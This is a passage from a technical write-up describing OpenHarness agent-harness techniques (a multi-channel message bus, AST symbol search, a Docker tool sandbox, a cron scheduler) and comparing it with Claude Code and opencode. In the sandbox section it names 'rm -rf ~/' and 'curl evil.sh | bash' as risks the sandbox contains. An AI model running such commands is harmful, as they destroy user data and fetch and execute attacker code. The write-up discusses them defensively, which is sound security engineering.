    """Single agent, many channels. Inbound from N channels into one queue;
    outbound from the agent fans out to the right channel via source_id."""

    def __init__(self):
        self.inbound: asyncio.Queue[ChannelMessage] = asyncio.Queue(maxsize=1024)
        self.outbound: asyncio.Queue[tuple[str, str, str]] = asyncio.Queue()
        self._channels: dict[str, ChannelAdapter] = {}

    def register(self, name: str, adapter: ChannelAdapter):
        self._channels[name] = adapter

    async def start(self):
        tasks = [asyncio.create_task(c.run(self)) for c in self._channels.values()]
        tasks.append(asyncio.create_task(self._outbound_dispatcher()))
        await asyncio.gather(*tasks, return_exceptions=True)

    async def _outbound_dispatcher(self):
        while True:
            channel, source_id, text = await self.outbound.get()
            adapter = self._channels.get(channel)
            if adapter:
                await adapter.send(source_id, text)

# Feishu adapter — WebSocket long-connection with a 40KB payload limit
class FeishuAdapter(ChannelAdapter):
    MAX_PAYLOAD = 40_000  # ~40KB per interactive card

    async def run(self, bus: MessageBus):
        client = lark.ws.Client(app_id=..., app_secret=...,
                                event_handler=lambda evt: self._on_event(evt, bus))
        await client.start()
Why it matters: Most harnesses assume the agent lives in a single channel (CLI, API). The MessageBus pattern lets one agent simultaneously receive messages from a Slack DM, a Feishu group, a Discord channel, a Telegram bot, and a Matrix room, all normalized into ChannelMessage. The outbound dispatcher handles re-formatting (e.g. Feishu cards, Slack Block Kit, Discord embeds). This is the foundation for the always-on personal agent (ohmo): the user pings from anywhere and the agent responds in the right context.

Code example (generic)

import asyncio
from abc import ABC, abstractmethod

class ChannelAdapter(ABC):
    @abstractmethod
    async def run(self, bus): ...

    @abstractmethod
    async def send(self, source_id: str, text: str): ...

class SlackAdapter(ChannelAdapter):
    def __init__(self, token):
        self.app = AsyncApp(token=token)
        self.app.event("message")(self._on_message)

    async def _on_message(self, event, say, bus):
        await bus.inbound.put(ChannelMessage(
            channel="slack",
            source_id=event["channel"],
            user=event["user"],
            text=event["text"],
            raw=event,
        ))

    async def send(self, source_id, text):
        await self.app.client.chat_postMessage(channel=source_id, text=text)

# One agent serving Slack + Discord at the same time
async def main():
    bus = MessageBus()
    bus.register("slack", SlackAdapter(token="xoxb-..."))
    bus.register("discord", DiscordAdapter(token="..."))

    async def agent_loop():
        while True:
            msg = await bus.inbound.get()
            reply = await llm_reply(msg.text, user=msg.user)
            await bus.outbound.put((msg.channel, msg.source_id, reply))

    await asyncio.gather(bus.start(), agent_loop())
Pros
  • Single agent, multi-channel: DRY adapter code
  • Inbound queue has backpressure (maxsize=1024)
  • Adapters are easy to swap (dev → Slack, prod → Feishu)
  • Keying by (channel, source_id) preserves thread context
Cons
  • Channel-specific features (rich cards, reactions, ephemeral messages) are hard to abstract
  • Each adapter handles its own rate limiting; there is no central limiter
  • Per-thread state is not yet isolated (without care, user A could see user B's reply)
  • Outbound truncation (Feishu 40KB, Slack 40KB blocks) is left to each adapter
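The per-channel payload caps in the cons list suggest one shared helper the adapters could reuse; a sketch that clips on a UTF-8 byte budget (`truncate_for_channel` is illustrative, not repo API):

```python
def truncate_for_channel(text: str, max_bytes: int = 40_000,
                         marker: str = "\n...[truncated]") -> str:
    """Clip an outbound message to a channel's payload cap (e.g. ~40KB
    for a Feishu card) without splitting a multibyte UTF-8 character."""
    raw = text.encode("utf-8")
    if len(raw) <= max_bytes:
        return text
    budget = max_bytes - len(marker.encode("utf-8"))
    clipped = raw[:budget].decode("utf-8", errors="ignore")  # drop a split char
    return clipped + marker
```

Counting bytes rather than characters matters because CJK text in Feishu messages is three bytes per character in UTF-8.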

T28. LSP-based code intelligence via AST

G.2
File: src/openharness/services/lsp/__init__.py · Lines: 1–100 · API: list_document_symbols, workspace_symbol_search, go_to_definition, find_references, hover

Code from OpenHarness

import ast
from pathlib import Path

def list_document_symbols(file_path: Path) -> list[Symbol]:
    """Return top-level functions, classes, and methods in one Python file
    via ast.parse(), with no external language server to spawn."""
    source = file_path.read_text(encoding="utf-8", errors="replace")
    try:
        tree = ast.parse(source)
    except SyntaxError:
        return []
    symbols = []
    for node in ast.walk(tree):
        if isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef)):
            symbols.append(Symbol(
                name=node.name, kind="function",
                line=node.lineno, col=node.col_offset,
            ))
        elif isinstance(node, ast.ClassDef):
            symbols.append(Symbol(
                name=node.name, kind="class",
                line=node.lineno, col=node.col_offset,
            ))
            for item in node.body:
                if isinstance(item, (ast.FunctionDef, ast.AsyncFunctionDef)):
                    symbols.append(Symbol(
                        name=f"{node.name}.{item.name}", kind="method",
                        line=item.lineno, col=item.col_offset,
                    ))
    return symbols

def workspace_symbol_search(root: Path, query: str) -> list[Symbol]:
    """Search symbol names across all *.py files — case-insensitive substring."""
    results = []
    for py_file in root.rglob("*.py"):
        if any(part.startswith(".") for part in py_file.parts):
            continue
        for sym in list_document_symbols(py_file):
            if query.lower() in sym.name.lower():
                results.append(sym._replace(file=py_file))
    return results
Why it matters: Instead of spawning pyright/pylsp (heavy, needs configuration, slow to start), OpenHarness uses the Python stdlib ast to parse read-only. The trade-off: no type inference and no cross-package import following, but good enough for 80% of agent use cases (finding functions, classes, method signatures). The agent calls workspace_symbol_search("handle_message") instead of grep -rn "def handle_message": the result is structured, with exact line/col positions.

Code example (generic)

import ast
from pathlib import Path


def find_function_definition(file: Path, name: str) -> tuple[int, int] | None:
    try:
        tree = ast.parse(file.read_text())
    except SyntaxError:
        return None
    for node in ast.walk(tree):
        if isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef)) \
                and node.name == name:
            return (node.lineno, node.col_offset)
    return None


def find_references(root: Path, name: str) -> list[tuple[Path, int]]:
    """Approximate: find Name/Attribute nodes with a matching id."""
    hits = []
    for py in root.rglob("*.py"):
        try:
            tree = ast.parse(py.read_text())
        except SyntaxError:
            continue
        for node in ast.walk(tree):
            if isinstance(node, ast.Name) and node.id == name:
                hits.append((py, node.lineno))
            elif isinstance(node, ast.Attribute) and node.attr == name:
                hits.append((py, node.lineno))
    return hits
Advantages
  • Zero-dep (stdlib ast only), no LSP server needed
  • Read-only, no side effects → safe as an agent tool
  • Exact line/col, structured output
  • Parses a file in < 10ms, even large files
Drawbacks
  • Syntax-only, no type or semantic understanding
  • Go-to-definition across imports must be resolved manually
  • Python only (other languages need their own adapters)
  • Misses macro/metaclass magic

T29. Docker sandbox for tool execution

G.3
File: src/openharness/sandbox/docker_backend.py · Container: openharness-sandbox-<session_id> · Optional: --sandbox docker flag

Code from OpenHarness

import docker
from docker.errors import DockerException
from pathlib import Path

# ExecResult and log are defined elsewhere in the module


class DockerSandbox:
    """Wrap tool execution in an isolated container. Tools talk over
    container-exec stdin/stdout and never see the host filesystem except
    through controlled volume mounts."""

    def __init__(self, session_id: str, workdir: Path):
        self.name = f"openharness-sandbox-{session_id}"
        self.workdir = workdir
        self._client = None
        self._container = None

    def check_available(self) -> bool:
        """Pre-flight: is the Docker daemon running? Platform supported?"""
        try:
            self._client = docker.from_env(timeout=5)
            self._client.ping()
            return True
        except DockerException as e:
            log.warning(f"Docker not available: {e}")
            return False

    async def start(self):
        self._container = self._client.containers.run(
            image="openharness/sandbox:latest",
            name=self.name,
            detach=True, stdin_open=True, tty=True,
            network_mode="bridge",   # has network; use "none" for offline
            mem_limit="2g",
            cpu_quota=100_000,       # 1 CPU
            read_only=False,         # the agent must write to /workspace
            volumes={str(self.workdir): {"bind": "/workspace", "mode": "rw"}},
            working_dir="/workspace",
            environment={"OPENHARNESS_SANDBOX": "1"},
        )

    async def exec(self, cmd: list[str], timeout: int = 600) -> ExecResult:
        if self._container is None:
            raise RuntimeError("sandbox not started")
        result = self._container.exec_run(
            cmd=cmd, stdout=True, stderr=True, demux=True,
        )
        return ExecResult(exit_code=result.exit_code, output=result.output)

    async def cleanup(self):
        if self._container:
            self._container.remove(force=True)
Why it matters: Running bash/python tools on the host always carries risk: rm -rf ~/, curl evil.sh | bash, or credential exfiltration. The Docker sandbox isolates execution: the agent writes to /workspace (a volume), and everything outside it is shielded by the container filesystem. Combined with network_mode (bridge/none), mem_limit, and cpu_quota, the sandbox blocks both "agent goes crazy → consumes all RAM" and "agent gets prompt-injected → exfiltrates data". The pre-flight check_available() allows graceful fallback to non-sandboxed execution when Docker is missing (CI, small VMs).

Code example (generic)

import subprocess

import docker


def docker_available() -> bool:
    try:
        docker.from_env(timeout=5).ping()
        return True
    except Exception:
        return False


def run_tool_in_container(cmd: list[str], workdir: str, timeout: int = 60):
    client = docker.from_env()
    try:
        output = client.containers.run(
            "python:3.12-slim", cmd,
            volumes={workdir: {"bind": "/work", "mode": "rw"}},
            working_dir="/work",
            mem_limit="512m",
            network_disabled=True,  # no egress
            remove=True,            # auto-cleanup
            detach=False, stdout=True, stderr=True,
        )
        return output.decode("utf-8", errors="replace")
    except docker.errors.ContainerError as e:
        return f"[exit {e.exit_status}]: {e.stderr.decode()}"


# Fallback if Docker is missing
def run_tool(cmd: list[str], workdir: str):
    if docker_available():
        return run_tool_in_container(cmd, workdir)
    return subprocess.run(cmd, cwd=workdir, capture_output=True, text=True)
Advantages
  • Blast radius limited to the container → host stays safe
  • Resource limits (mem/cpu/network) block DoS
  • Reproducible env (pinned image version)
  • Optional: Docker isn't forced on users who don't have it
Drawbacks
  • Requires a Docker daemon, excluding some users (small VMs, restricted CI)
  • Container startup overhead (~1s) per session
  • /workspace is bind-mounted rw, so a compromised agent can still damage that host directory
  • The openharness/sandbox:latest image must be built & published → supply-chain risk

T30. Cron scheduler + persistent background tasks

G.4
File: src/openharness/tasks/manager.py · src/openharness/services/cron_scheduler.py · Storage: ~/.openharness/cron/registry.json + cron_history.jsonl · Tick: 30s

Code from OpenHarness

import asyncio
import json
from dataclasses import asdict, dataclass
from datetime import datetime
from pathlib import Path
from typing import Awaitable, Callable

from croniter import croniter


@dataclass
class CronJob:
    job_id: str
    name: str
    cron_expr: str               # "*/30 * * * *"
    prompt: str                  # agent prompt to run when the job fires
    enabled: bool = True
    last_run: str | None = None
    next_run: str | None = None


class CronScheduler:
    TICK = 30  # seconds

    def __init__(self, registry_path: Path, history_path: Path):
        self.registry_path = registry_path
        self.history_path = history_path
        self.jobs: dict[str, CronJob] = self._load()

    def _load(self) -> dict[str, CronJob]:
        if not self.registry_path.exists():
            return {}
        data = json.loads(self.registry_path.read_text())
        return {j["job_id"]: CronJob(**j) for j in data}

    def _save(self):
        self.registry_path.write_text(json.dumps(
            [asdict(j) for j in self.jobs.values()], indent=2,
        ))

    async def run_forever(self, on_fire: Callable[[CronJob], Awaitable]):
        while True:
            now = datetime.utcnow()
            for job in list(self.jobs.values()):
                if not job.enabled:
                    continue
                base = datetime.fromisoformat(job.last_run) if job.last_run else now
                itr = croniter(job.cron_expr, base)
                if itr.get_next(datetime) <= now:
                    asyncio.create_task(self._fire(job, on_fire))
                    job.last_run = now.isoformat()
                    self._save()
            await asyncio.sleep(self.TICK)

    async def _fire(self, job: CronJob, on_fire):
        try:
            result = await on_fire(job)
            self._append_history({
                "job_id": job.job_id,
                "fired_at": datetime.utcnow().isoformat(),
                "ok": True,
                "result_preview": result[:500],
            })
        except Exception as e:
            self._append_history({"job_id": job.job_id, "ok": False, "error": str(e)})

    def _append_history(self, entry: dict):
        with self.history_path.open("a") as f:
            f.write(json.dumps(entry) + "\n")
Why it matters: This turns the agent from "on-demand" into "proactive". A user can set: "every morning at 8, check CI on the main branch and ping Slack if it fails", or "every 30 minutes, pull Jira and update statuses". Persistence (JSON registry) means jobs survive restarts. The JSONL history log enables auditing. Per-job enable/disable makes maintenance easy. The 30s tick is a trade-off: fast enough not to miss a one-minute cron, slow enough not to spam. The croniter library handles edge cases (end of month, DST).

Code example (generic)

import asyncio

from apscheduler.schedulers.asyncio import AsyncIOScheduler
from apscheduler.triggers.cron import CronTrigger

# run_agent / save_history are application-specific and defined elsewhere


async def agent_job(prompt: str):
    response = await run_agent(prompt)
    save_history(prompt, response)


async def main():
    scheduler = AsyncIOScheduler()
    # Cron: Mon-Fri 09:00
    scheduler.add_job(
        agent_job,
        trigger=CronTrigger.from_crontab("0 9 * * 1-5"),
        args=["Summarize overnight alerts"],
        id="daily-triage",
        replace_existing=True,
    )
    scheduler.start()
    await asyncio.Event().wait()  # run forever
Advantages
  • The agent becomes a proactive assistant, no user ping required
  • Persists across restarts → reliability
  • History log for audit + debugging
  • Per-job enable/disable makes pausing for maintenance easy
Drawbacks
  • The 30s tick misses sub-30s cron granularity
  • Not distributed: multiple running instances will fire duplicates
  • The JSON registry is not concurrent-safe (write-via-rename still needed)
  • Failure recovery depends on users reading the history; there is no automatic alerting

Conclusion: Comparing OpenHarness · opencode · Claude Code

After 30 techniques, it is clear that OpenHarness is not merely a "Python port of Claude Code". It is a superset in automation capability, trading some CLI elegance to expand into an agent organization platform: one where agents can live in independent subprocesses, listen on N channels, run on cron schedules, and be isolated in Docker.

Three axes of comparison

| Aspect | Claude Code (TS, closed-source) | opencode (sst/anomalyco, TS) | HKUDS/OpenHarness (Python) |
|---|---|---|---|
| Language | TypeScript + Bun | TypeScript + Bun + Effect-TS | Python 3.10+ + asyncio |
| TUI | React Ink | React Ink | Rich/Textual + React Ink (dual) |
| Agent loop | ReAct async | ReAct async | ReAct async, single/parallel branching |
| Compaction | Auto-compact | Tail-preserving + template | Proactive + reactive + PTL retry |
| Sub-agent | Task tool in-session | Task tool in-session | Subprocess + worktree + mailbox |
| Permission | 3-mode + hook | Wildcard + arity + state | 3-mode + 6-layer + sensitive path |
| Memory | CLAUDE.md | CLAUDE.md | Per-project dir + MEMORY.md + search |
| Hooks | 6 events × 2 types | Hook + Tool Hook | 6 events × 4 types + hot reload |
| Skills | Markdown + frontmatter | Prompt + tool filter | Markdown + frontmatter + plugin |
| MCP | stdio + HTTP | stdio + HTTP | stdio + HTTP + dynamic Pydantic |
| Channels | CLI only | CLI only | Slack/Feishu/Discord/Telegram/Matrix |
| Autopilot | N/A | N/A | Dashboard + repo automation |
| Sandbox | N/A | N/A | Docker optional |
| Cron | N/A | N/A | Persistent scheduler (30s tick) |
| LSP | N/A | N/A | AST-based built-in |

When to choose OpenHarness

OpenHarness is a good fit when:
  • The team knows Python and wants to fork and customize deeply (no lock-in to the JS ecosystem)
  • The workflow needs long-running agents (Slack bot, cron triage, CI auto-fix)
  • You want real multi-agent coordination (leader + workers + branch isolation via worktree)
  • You need a Docker sandbox for tool execution (compliance / security)
  • You want structured persistent memory (per-project MEMORY.md, searchable via a CJK-aware tokenizer)
Not a good fit when:
  • You only need plain CLI pair-programming: opencode or Claude Code is simpler
  • The workflow is monolithic, one agent per session: swarm + channels become dead weight
  • The team is all-TypeScript: forking and contributing is easier with opencode

Harness engineering lessons

OpenHarness demonstrates that scaffolding matters no less than the model. Three principles recur throughout the code:

  1. Atomic write: every state-changing file is written as write(.tmp) then rename (mailbox, registry, permission sync). This avoids partial-read races.
  2. Layered evaluation: 6-layer permissions, 2-phase compaction (proactive + reactive + PTL retry), a 9-section prompt. Each layer has a distinct responsibility and is easy to reason about.
  3. Structured observability: streaming events with a union type + 9-phase progress, JSONL history, pre/post hooks. The agent can be debugged from logs, with no manual reproduction.

If you are building your own harness, five ideas worth copying from OpenHarness right away: (1) per-project memory hashing, (2) a CJK-aware tokenizer, (3) hardcoded sensitive-path blocks, (4) subprocess + mailbox for subagents, (5) dual-channel permission sync. These details are easy to overlook when viewing the "agent loop" at a high level, but they decide whether a harness can run 24/7 in production.

References

Repo & source code

Harness engineering

Context, compaction & memory

Tool design & safety

MCP & plugins

Multi-agent & swarm

Git worktree & IPC

Channels & LSP

Sandbox & cron

Comparisons & failure modes